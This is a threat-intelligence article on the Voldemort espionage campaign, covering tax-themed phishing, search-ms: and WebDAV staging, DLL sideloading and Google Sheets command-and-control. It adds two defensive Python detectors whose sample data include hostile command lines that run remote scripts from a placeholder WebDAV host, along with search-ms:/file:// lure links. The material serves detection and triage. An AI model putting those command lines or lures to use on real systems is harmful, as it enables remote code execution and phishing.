Voldemort Malware
Cybersecurity researchers have identified a new malware campaign that uses Google Sheets as a Command-and-Control (C2) platform.
Detected by researchers in August 2024, the attack campaign masquerades as tax authorities from Europe, Asia, and the U.S. to target more than 70 organizations worldwide. The attackers use a custom tool called Voldemort, designed to collect information and deploy additional malware.
The targeted sectors include insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom and social benefit organizations. Although the cyber espionage campaign has not been linked to a specific threat actor, it is estimated that up to 20,000 emails have been sent in these attacks.
Initial Compromise Vector Exploited by Attackers
The discovered emails purport to be from tax authorities in the U.S., U.K., France, Germany, Italy, India, and Japan, informing recipients of updates to their tax filings and prompting them to click on Google AMP Cache URLs that direct them to an intermediary landing page.
This page checks the User-Agent string to determine whether the visitor is running Windows. If so, it invokes the search-ms: URI protocol handler, which opens a Windows Explorer search view listing a Windows shortcut (LNK) file hosted on a remote share; the shortcut is disguised as an Adobe Acrobat Reader PDF in an attempt to deceive the victim into opening it.
If the LNK file is executed, it launches PowerShell, which runs Python.exe from a WebDAV share (\library) and passes as its argument a Python script hosted on a second share (\resource) on the same server.
How the Voldemort Malware is Deployed on Compromised Systems
This method lets Python execute the script without writing any files to disk; the script's dependencies are also loaded directly from the WebDAV share.
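Because nothing is written to disk in this stage, process-creation telemetry is the most reliable place to catch it. The following is an added example, not code from the original article or from the researchers: it runs over a few constructed Sysmon-style (Event ID 1) records and flags a binary such as python.exe executed from a UNC/WebDAV path (the `\\host@SSL` and `\\host@port` forms are the WebDAV mini-redirector's syntax), a script argument on a remote share, and a script-host parent such as PowerShell. The field names, the sample events, the TEST-NET address and the example domain are assumptions for illustration only.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation records used as sample input.
# Hosts are reserved TEST-NET addresses / example domains, not indicators from the campaign.
SAMPLE_EVENTS = [
    {   # the chain described above: PowerShell runs python.exe from a WebDAV share
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"\\203.0.113.10@80\library\python.exe",
        "CommandLine": r"\\203.0.113.10@80\library\python.exe \\203.0.113.10@80\resource\stage.py",
    },
    {   # benign: a developer running a local script from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Python312\python.exe",
        "CommandLine": r"C:\Python312\python.exe C:\Users\alice\build.py",
    },
    {   # PowerShell pointed at an internal file server; suspicious unless that host is trusted
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -w hidden \\fileserver.corp.example\library\python.exe \\fileserver.corp.example\resource\run.py",
    },
]

# \\host[@SSL|@port]\share ... ; the @SSL / @port suffix is the WebDAV mini-redirector's UNC syntax
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)(?:@(?:SSL|\d+))?\\([^\\\s\"']+)")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
INTERPRETERS = {"python.exe", "pythonw.exe"}


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unc_targets(text):
    """Return (host, share) pairs for every UNC path found in text."""
    return [(host.lower(), share.lower()) for host, share in UNC_RE.findall(text)]


def assess_event(event, trusted_hosts=frozenset()):
    """Return a finding for one event, or None when nothing points at an untrusted remote share."""
    image_unc = unc_targets(event["Image"])
    cmd_unc = unc_targets(event["CommandLine"])
    trusted = {h.lower() for h in trusted_hosts}
    hosts = {host for host, _ in image_unc + cmd_unc} - trusted
    if not hosts:
        return None
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    reasons = []
    if image_unc:
        reasons.append(f"{image} executed directly from a remote share")
    if image in INTERPRETERS and len(cmd_unc) > 1:
        reasons.append("interpreter given a script argument on a remote share")
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    if image in SCRIPT_HOSTS and cmd_unc:
        reasons.append(f"{image} command line references a remote share")
    return {
        "hosts": sorted(hosts),
        "shares": sorted({share for _, share in image_unc + cmd_unc}),
        "reasons": reasons,
    }


def scan(events, trusted_hosts=frozenset()):
    """Run assess_event over a batch of events and keep only the findings."""
    return [f for f in (assess_event(e, trusted_hosts) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The `trusted_hosts` allowlist exists because legitimate software is sometimes run from internal shares; the internal file-server event above is reported by default and dropped once that host is allowlisted, while the external WebDAV host is reported either way.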
The Python script is programmed to collect system information and transmit it as a Base64-encoded string to a domain controlled by the attackers. Afterward, it displays a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive.
The ZIP archive contains two files: a legitimate executable, 'CiscoCollabHost.exe,' which is susceptible to DLL sideloading, and a malicious DLL, 'CiscoSparkLauncher.dll' (tracked as Voldemort), which the executable loads in place of the genuine library.
Capabilities of the Voldemort Malware Threat
Voldemort is a custom backdoor written in C with capabilities for information gathering and loading next-stage payloads. The malware uses Google Sheets for C2: it retrieves operator commands from, and exfiltrates data to, a spreadsheet the attackers control.
Researchers described the activity as aligned with Advanced Persistent Threat (APT) operations but carrying cybercrime traits, owing to its use of techniques popular in the e-crime landscape.
Threat actors abuse file scheme URIs to reach external file-sharing resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is done by using the 'file://' scheme and pointing it at a remote server hosting the malicious content, which causes Windows to retrieve the content over SMB or WebDAV rather than HTTP.
This approach has become increasingly common among malware families used for initial access, such as Latrodectus, DarkGate and XWorm.
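Both the search-ms: lure described earlier and the file:// staging described here hand Windows a remote share location inside a URI, so an analyst triaging a landing page or an e-mail wants those locations pulled out and the hosts listed. The following is an added example, not code from the original article or from the researchers: it parses a constructed HTML fragment, decodes the `crumb=location:` parameter of search-ms: URIs and the authority of file:// URIs, ignores local file:/// paths, and returns the remote hosts a victim's machine would contact. The sample page, the TEST-NET address and the share names are assumptions for illustration only.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed landing-page fragment used as sample input; hosts are TEST-NET / example values,
# not indicators from the campaign.
SAMPLE_HTML = """
<a href="search-ms:query=tax_return&amp;crumb=location:%5C%5C203.0.113.10%40SSL%5CDavWWWRoot%5Clibrary&amp;displayname=Downloads">Open your document</a>
<a href="file://203.0.113.10/resource/statement.pdf">Statement</a>
<a href="file:///C:/Users/Public/readme.txt">Local file (benign)</a>
<a href="https://www.example.gov/taxes">Tax portal (benign)</a>
"""

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
# \\host[@SSL|@port]\share  (WebDAV mini-redirector UNC syntax)
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)(?:@(?:SSL|\d+))?\\")


def classify_uri(uri):
    """Return {'scheme', 'host', 'path'} if the URI points Windows at a remote share, else None."""
    parts = urlsplit(uri.strip())
    scheme = parts.scheme.lower()
    if scheme == "file":
        host = parts.netloc.lower()
        if host in ("", "localhost"):      # file:///C:/... is a local path, not remote staging
            return None
        return {"scheme": "file", "host": host, "path": unquote(parts.path)}
    if scheme == "search-ms":
        # search-ms: has no '//' or '?', so urlsplit leaves the whole k=v&k=v list in .path;
        # parse_qs percent-decodes the values, turning %5C%5C back into a UNC prefix
        params = parse_qs(parts.path)
        for crumb in params.get("crumb", []):
            if crumb.lower().startswith("location:"):
                location = crumb[len("location:"):]
                m = UNC_RE.match(location)
                if m:
                    return {"scheme": "search-ms", "host": m.group(1).lower(), "path": location}
    return None


def scan_lure(page):
    """Extract every href from the page and return those that reference a remote share, in order."""
    findings = []
    for raw in HREF_RE.findall(page):
        result = classify_uri(html.unescape(raw))
        if result:
            findings.append(result)
    return findings


def remote_hosts(page):
    """Distinct hosts a victim's machine would contact over WebDAV/SMB, for blocklists or triage."""
    return sorted({f["host"] for f in scan_lure(page)})


if __name__ == "__main__":
    for f in scan_lure(SAMPLE_HTML):
        print(f)
    print("hosts to investigate:", remote_hosts(SAMPLE_HTML))
```

A search-ms: location that names only a local drive, or a file:/// URI with an empty authority, is deliberately not reported: the point of the check is outbound WebDAV/SMB to a host the organisation does not own, which is also the traffic worth blocking at the perimeter.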
The Goal of the Attacker Remains Unknown
The campaign's breadth is unusual for espionage activity, suggesting that the threat actors may have initially targeted a broad range of potential victims before narrowing their focus to a select group. It is also possible that the attackers, who appear to possess varying levels of technical expertise, intended to compromise multiple organizations from the outset.
Although many aspects of the campaign resemble typical cybercriminal activity, we believe it is most likely an espionage effort with as-yet-unknown objectives. The campaign's blend of advanced and clever tactics with some basic techniques complicates the assessment of the threat actor's capabilities and makes it difficult to determine their ultimate goals with high confidence.